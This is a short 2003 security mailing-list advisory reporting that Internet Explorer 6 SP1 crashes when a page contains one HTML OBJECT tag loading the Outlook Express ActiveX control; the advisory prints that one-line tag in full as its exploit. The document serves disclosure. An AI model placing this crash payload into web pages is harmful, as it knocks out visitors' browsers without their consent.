IE6 SP1 - Trivial Crash

From: James Wolfe (jamesat_private)
Date: Tue Jul 29 2003 - 07:06:33 PDT

    Overview/Description:

        In March of 2000, someone posted to bugtraq a flaw in the MS Outlook
    Express ActiveX control which allowed for "the reading of any file on the
    users machine." My guess is that MS, in an attempt to bugfix it, didnt debug
    properly and left the following new bug. So now, using the same OE ActiveX
    Control, a single line of code can crash IE.

    Exploit:

        <OBJECT CLASSID="CLSID:1C82EAD9-508E-11D1-8DCF-00C04FB951F9"
    data="1.html"></OBJECT>

    Recommendation:

        Don't put this line of code in your pages. Other than that, I dont know
    what to tell you.

    Credit:

        This vulnerability was discovered by James Wolfe of QuIC Solutions, Inc.